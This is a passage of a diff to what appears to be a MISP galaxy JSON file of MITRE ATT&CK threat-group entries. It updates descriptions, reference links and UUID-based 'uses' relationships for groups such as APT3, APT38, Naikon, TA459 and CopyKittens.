"uses" }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "22addc7b-b39f-483d-979a-1b35147da5de", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "2a158b0a-7ef8-43cb-9985-bf34d1e12050", "value": "Naikon - G0019" }, { - "description": "[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security. (Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. (Citation: FireEye Clandestine Wolf) (Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. (Citation: Symantec Buckeye)\n\nAPT3 Adversary Emulation Plan - (Citation: APT3 Adversary Emulation Plan)", + "description": "[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security. (Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. (Citation: FireEye Clandestine Wolf) (Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. (Citation: Symantec Buckeye)\n\nMITRE has also developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)", "meta": { "external_id": "G0022", "refs": [ "https://attack.mitre.org/groups/G0022", "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html", - "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", - "http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html", - "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", "https://www.recordedfuture.com/chinese-mss-behind-apt3/", - "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf" + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html" ], "synonyms": [ "APT3", @@ -7374,69 +8582,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a6525aec-acc4-47fe-92f9-b9b4de4b9228", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4e6b9625-bbda-4d96-a652-b3bb45453f26", "tags": [ @@ -7444,34 +8589,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ @@ -7479,48 +8596,6 @@ ], "type": "uses" }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "58adaaa8-f1e8-4606-9a08-422e568461eb", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ @@ -7529,28 +8604,35 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7563,13 +8645,6 @@ ], "type": "uses" }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c9703cd3-141c-43a0-a926-380082be5d04", "tags": [ @@ -7578,56 +8653,49 @@ "type": "uses" }, { - "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "a6525aec-acc4-47fe-92f9-b9b4de4b9228", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7640,6 +8708,13 @@ ], "type": "uses" }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ @@ -7648,7 +8723,49 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7662,21 +8779,7 @@ "type": "uses" }, { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7696,17 +8799,295 @@ ], "type": "uses" }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "f6d1d2cb-12f5-4221-9636-44606ea1f3f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "58adaaa8-f1e8-4606-9a08-422e568461eb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0bbdf25b-30ff-4894-a1cd-49260d0dd2d9", "value": "APT3 - G0022" }, + { + "description": "[APT38](https://attack.mitre.org/groups/G0082) is a financially-motivated threat group that is backed by the North Korean regime. The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014.(Citation: FireEye APT38 Oct 2018)\n\nNorth Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.", + "meta": { + "external_id": "G0082", + "refs": [ + "https://attack.mitre.org/groups/G0082", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securelist.com/lazarus-under-the-hood/77908/" + ], + "synonyms": [ + "APT38" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1f47e2fd-fa77-4f2f-88ee-e85df308f125", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "53ab35c2-d00e-491a-8753-41d35ae7e547", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "00f67a77-86a4-4adf-be26-1a54fc713340", + "value": "APT38 - G0082" + }, { "description": "[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)", "meta": { @@ -7735,7 +9116,14 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "4ab44516-ad75-4e43-a280-705dc0420e2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7749,7 +9137,7 @@ "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7770,21 +9158,14 @@ "type": "uses" }, { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4ab44516-ad75-4e43-a280-705dc0420e2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7832,10 +9213,7 @@ "meta": { "external_id": "G0052", "refs": [ - "https://attack.mitre.org/groups/G0052", - "http://www.clearskysec.com/copykitten-jpost/", - "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf", - "https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf" + "https://attack.mitre.org/groups/G0052" ], "synonyms": [ "CopyKittens" @@ -7864,14 +9242,14 @@ "type": "uses" }, { - "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7897,6 +9275,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "dcd81c6e-ebf7-4a16-93e0-9a97fa49c88a", @@ -7916,56 +9301,7 @@ }, "related": [ { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7985,6 +9321,20 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -7993,63 +9343,7 @@ "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8063,14 +9357,56 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8083,6 +9419,20 @@ ], "type": "uses" }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -8091,7 +9441,42 @@ "type": "uses" }, { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8108,10 +9493,12 @@ "refs": [ 